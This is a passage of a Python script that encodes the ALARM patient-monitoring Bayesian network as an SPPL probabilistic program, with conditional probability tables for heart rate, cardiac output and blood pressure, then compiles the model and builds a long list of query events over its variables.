CATECHOL ~= choice({'NORMAL' : 0.1, 'HIGH' : 0.9})
elif(SAO2 == 'NORMAL'):
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
else:
CATECHOL ~= choice({'NORMAL' : 0.3, 'HIGH' : 0.7})
else:
if(TPR == 'LOW'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
elif(TPR == 'NORMAL'):
CATECHOL ~= choice({'NORMAL' : 0.01, 'HIGH' : 0.99})
else:
CATECHOL ~= choice({'NORMAL' : 0.3, 'HIGH' : 0.7})
if (CATECHOL == 'NORMAL'):
HR ~= choice({'LOW' : 0.05, 'NORMAL' : 0.9, 'HIGH' : 0.04999999999999993})
else:
HR ~= choice({'LOW' : 0.01, 'NORMAL' : 0.09, 'HIGH' : 0.9})
if (ERRLOWOUTPUT == 'TRUE'):
if (HR == 'LOW'):
HRBP ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(HR == 'NORMAL'):
HRBP ~= choice({'LOW' : 0.3, 'NORMAL' : 0.4, 'HIGH' : 0.30000000000000004})
else:
HRBP ~= choice({'LOW' : 0.01, 'NORMAL' : 0.98, 'HIGH' : 0.010000000000000009})
else:
if(HR == 'LOW'):
HRBP ~= choice({'LOW' : 0.4, 'NORMAL' : 0.59, 'HIGH' : 0.010000000000000009})
elif(HR == 'NORMAL'):
HRBP ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
HRBP ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
if (ERRCAUTER == 'TRUE'):
if (HR == 'LOW'):
HREKG ~= choice({'LOW' : 0.3333333, 'NORMAL' : 0.3333333, 'HIGH' : 0.3333334})
elif(HR == 'NORMAL'):
HREKG ~= choice({'LOW' : 0.3333333, 'NORMAL' : 0.3333333, 'HIGH' : 0.3333334})
else:
HREKG ~= choice({'LOW' : 0.01, 'NORMAL' : 0.98, 'HIGH' : 0.010000000000000009})
else:
if(HR == 'LOW'):
HREKG ~= choice({'LOW' : 0.3333333, 'NORMAL' : 0.3333333, 'HIGH' : 0.3333334})
elif(HR == 'NORMAL'):
HREKG ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
HREKG ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
if (ERRCAUTER == 'TRUE'):
if (HR == 'LOW'):
HRSAT ~= choice({'LOW' : 0.3333333, 'NORMAL' : 0.3333333, 'HIGH' : 0.3333334})
elif(HR == 'NORMAL'):
HRSAT ~= choice({'LOW' : 0.3333333, 'NORMAL' : 0.3333333, 'HIGH' : 0.3333334})
else:
HRSAT ~= choice({'LOW' : 0.01, 'NORMAL' : 0.98, 'HIGH' : 0.010000000000000009})
else:
if(HR == 'LOW'):
HRSAT ~= choice({'LOW' : 0.3333333, 'NORMAL' : 0.3333333, 'HIGH' : 0.3333334})
elif(HR == 'NORMAL'):
HRSAT ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
HRSAT ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
if (HR == 'LOW'):
if (STROKEVOLUME == 'LOW'):
CO ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(STROKEVOLUME == 'NORMAL'):
CO ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
else:
CO ~= choice({'LOW' : 0.3, 'NORMAL' : 0.69, 'HIGH' : 0.010000000000000009})
elif(HR == 'NORMAL'):
if(STROKEVOLUME == 'LOW'):
CO ~= choice({'LOW' : 0.95, 'NORMAL' : 0.04, 'HIGH' : 0.010000000000000009})
elif(STROKEVOLUME == 'NORMAL'):
CO ~= choice({'LOW' : 0.04, 'NORMAL' : 0.95, 'HIGH' : 0.010000000000000009})
else:
CO ~= choice({'LOW' : 0.01, 'NORMAL' : 0.3, 'HIGH' : 0.69})
else:
if(STROKEVOLUME == 'LOW'):
CO ~= choice({'LOW' : 0.8, 'NORMAL' : 0.19, 'HIGH' : 0.010000000000000009})
elif(STROKEVOLUME == 'NORMAL'):
CO ~= choice({'LOW' : 0.01, 'NORMAL' : 0.04, 'HIGH' : 0.95})
else:
CO ~= choice({'LOW' : 0.01, 'NORMAL' : 0.01, 'HIGH' : 0.98})
if (CO == 'LOW'):
if (TPR == 'LOW'):
BP ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(TPR == 'NORMAL'):
BP ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
else:
BP ~= choice({'LOW' : 0.3, 'NORMAL' : 0.6, 'HIGH' : 0.10000000000000009})
elif(CO == 'NORMAL'):
if(TPR == 'LOW'):
BP ~= choice({'LOW' : 0.98, 'NORMAL' : 0.01, 'HIGH' : 0.010000000000000009})
elif(TPR == 'NORMAL'):
BP ~= choice({'LOW' : 0.1, 'NORMAL' : 0.85, 'HIGH' : 0.050000000000000044})
else:
BP ~= choice({'LOW' : 0.05, 'NORMAL' : 0.4, 'HIGH' : 0.55})
else:
if(TPR == 'LOW'):
BP ~= choice({'LOW' : 0.9, 'NORMAL' : 0.09, 'HIGH' : 0.010000000000000009})
elif(TPR == 'NORMAL'):
BP ~= choice({'LOW' : 0.05, 'NORMAL' : 0.2, 'HIGH' : 0.75})
else:
BP ~= choice({'LOW' : 0.01, 'NORMAL' : 0.09, 'HIGH' : 0.9})
'''
compiler = SPPL_Compiler(data)
namespace = compiler.execute_module()
model=namespace.model
ANAPHYLAXIS = Id('ANAPHYLAXIS')
ARTCO2 = Id('ARTCO2')
BP = Id('BP')
CATECHOL = Id('CATECHOL')
CO = Id('CO')
CVP = Id('CVP')
DISCONNECT = Id('DISCONNECT')
ERRCAUTER = Id('ERRCAUTER')
ERRLOWOUTPUT = Id('ERRLOWOUTPUT')
EXPCO2 = Id('EXPCO2')
FIO2 = Id('FIO2')
HISTORY = Id('HISTORY')
HR = Id('HR')
HRBP = Id('HRBP')
HREKG = Id('HREKG')
HRSAT = Id('HRSAT')
HYPOVOLEMIA = Id('HYPOVOLEMIA')
INSUFFANESTH = Id('INSUFFANESTH')
INTUBATION = Id('INTUBATION')
KINKEDTUBE = Id('KINKEDTUBE')
LVEDVOLUME = Id('LVEDVOLUME')
LVFAILURE = Id('LVFAILURE')
MINVOL = Id('MINVOL')
MINVOLSET = Id('MINVOLSET')
PAP = Id('PAP')
PCWP = Id('PCWP')
PRESS = Id('PRESS')
PULMEMBOLUS = Id('PULMEMBOLUS')
PVSAT = Id('PVSAT')
SAO2 = Id('SAO2')
SHUNT = Id('SHUNT')
STROKEVOLUME = Id('STROKEVOLUME')
TPR = Id('TPR')
VENTALV = Id('VENTALV')
VENTLUNG = Id('VENTLUNG')
VENTMACH = Id('VENTMACH')
VENTTUBE = Id('VENTTUBE')
events = [VENTLUNG << {'LOW'},CATECHOL << {'HIGH'},PRESS << {'ZERO'},ARTCO2 << {'NORMAL'},VENTALV << {'ZERO'},INSUFFANESTH << {'FALSE'},HYPOVOLEMIA << {'TRUE'},LVFAILURE << {'FALSE'},SHUNT << {'HIGH'},PRESS << {'HIGH'},VENTMACH << {'HIGH'},PRESS << {'HIGH'},HYPOVOLEMIA << {'TRUE'},VENTTUBE << {'LOW'},DISCONNECT << {'TRUE'},BP << {'HIGH'},PVSAT << {'LOW'},HISTORY << {'TRUE'},BP << {'NORMAL'},HREKG << {'NORMAL'},SHUNT << {'HIGH'},INTUBATION << {'ESOPHAGEAL'},PRESS << {'ZERO'},INSUFFANESTH << {'TRUE'},VENTLUNG << {'LOW'},CATECHOL << {'HIGH'},HISTORY << {'FALSE'},PCWP << {'NORMAL'},BP << {'HIGH'},HR << {'LOW'},MINVOL << {'LOW'},INTUBATION << {'ONESIDED'},CATECHOL << {'NORMAL'},LVFAILURE << {'FALSE'},MINVOLSET << {'NORMAL'},MINVOL << {'NORMAL'},DISCONNECT << {'TRUE'},VENTALV << {'HIGH'},CATECHOL << {'HIGH'},ANAPHYLAXIS << {'TRUE'},ERRLOWOUTPUT << {'FALSE'},HR << {'LOW'},HISTORY << {'TRUE'},MINVOLSET << {'LOW'},HISTORY << {'TRUE'},INSUFFANESTH << {'FALSE'},ERRCAUTER << {'FALSE'},CATECHOL << {'HIGH'},PCWP << {'NORMAL'},PRESS << {'ZERO'},(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'LOW'}) & (CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'LOW'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'NORMAL'}) & (PCWP << {'LOW'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'NORMAL'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'HIGH'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'LOW'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'HIGH'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'LOW'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'LOW'}) & (TPR << {'NORMAL'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'HIGH'}) & (PCWP << {'LOW'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'NORMAL'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'HIGH'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'NORMAL'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'LOW'}) & (MINVOLSET << {'LOW'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'HIGH'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'LOW'}) & (HRBP << {'HIGH'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'HIGH'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'HIGH'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'NORMAL'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'HIGH'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'NORMAL'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'NORMAL'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'HIGH'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'HIGH'}) & (HRBP << {'LOW'}) & (HREKG << {'LOW'}) & (HRSAT << {'NORMAL'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'LOW'}) & (PCWP << {'LOW'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'HIGH'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'ZERO'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'HIGH'}) & (CATECHOL << {'NORMAL'}) & (CO << {'LOW'}) & (CVP << {'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'NORMAL'}) & (HRBP << {'LOW'}) & (HREKG << {'LOW'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'LOW'}) & (PAP << {'HIGH'}) & (PCWP << {'NORMAL'}) & (PRESS << {'LOW'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'NORMAL'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'HIGH'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'HIGH'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'NORMAL'}) & (PCWP << {'NORMAL'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'LOW'}) & (BP << {'HIGH'}) & (CATECHOL << {'HIGH'}) & (CO << {'HIGH'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'NORMAL'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'HIGH'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'LOW'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'LOW'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'HIGH'}) & (VENTMACH << {'NORMAL'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'FALSE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'HIGH'}) & (CATECHOL << {'HIGH'}) & (CO << {'NORMAL'}) & (CVP << {'HIGH'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'LOW'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ONESIDED'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'TRUE'}) & (MINVOL << {'NORMAL'}) & (MINVOLSET << {'LOW'}) & (PAP << {'LOW'}) & (PCWP << {'LOW'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'FALSE'}) & (PVSAT << {'LOW'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'NORMAL'}) & (VENTALV << {'HIGH'}) & (VENTLUNG << {'ZERO'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'HIGH'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'HIGH'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'HIGH'}) & (CVP << {'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'ZERO'}) & (FIO2 << {'LOW'}) & (HISTORY << {'FALSE'}) & (HR << {'LOW'}) & (HRBP << {'HIGH'}) & (HREKG << {'LOW'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'NORMAL'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'HIGH'}) & (MINVOLSET << {'HIGH'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'HIGH'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'HIGH'}) & (SAO2 << {'NORMAL'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'NORMAL'}) & (TPR << {'HIGH'}) & (VENTALV << {'LOW'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'ZERO'}) & (VENTTUBE << {'NORMAL'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'NORMAL'}) & (BP << {'LOW'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'LOW'}) & (DISCONNECT << {'TRUE'}) & (ERRCAUTER << {'FALSE'}) & (ERRLOWOUTPUT << {'FALSE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'LOW'}) & (HISTORY << {'TRUE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'HIGH'}) & (HRSAT << {'HIGH'}) & (HYPOVOLEMIA << {'FALSE'}) & (INSUFFANESTH << {'TRUE'}) & (INTUBATION << {'ESOPHAGEAL'}) & (KINKEDTUBE << {'TRUE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'NORMAL'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'NORMAL'}) & (PULMEMBOLUS << {'TRUE'}) & (PVSAT << {'NORMAL'}) & (SAO2 << {'HIGH'}) & (SHUNT << {'HIGH'}) & (STROKEVOLUME << {'HIGH'}) & (TPR << {'HIGH'}) & (VENTALV << {'ZERO'}) & (VENTLUNG << {'LOW'}) & (VENTMACH << {'LOW'}) & (VENTTUBE << {'LOW'}),(ANAPHYLAXIS << {'TRUE'}) & (ARTCO2 << {'LOW'}) & (BP << {'NORMAL'}) & (CATECHOL << {'NORMAL'}) & (CO << {'NORMAL'}) & (CVP << {'NORMAL'}) & (DISCONNECT << {'FALSE'}) & (ERRCAUTER << {'TRUE'}) & (ERRLOWOUTPUT << {'TRUE'}) & (EXPCO2 << {'LOW'}) & (FIO2 << {'NORMAL'}) & (HISTORY << {'TRUE'}) & (HR << {'LOW'}) & (HRBP << {'NORMAL'}) & (HREKG << {'NORMAL'}) & (HRSAT << {'LOW'}) & (HYPOVOLEMIA << {'TRUE'}) & (INSUFFANESTH << {'FALSE'}) & (INTUBATION << {'NORMAL'}) & (KINKEDTUBE << {'FALSE'}) & (LVEDVOLUME << {'LOW'}) & (LVFAILURE << {'FALSE'}) & (MINVOL << {'ZERO'}) & (MINVOLSET << {'LOW'}) & (PAP << {'NORMAL'}) & (PCWP << {'HIGH'}) & (PRESS << {'ZERO'}) & (PULMEMBOLUS << {'TRUE'}) & 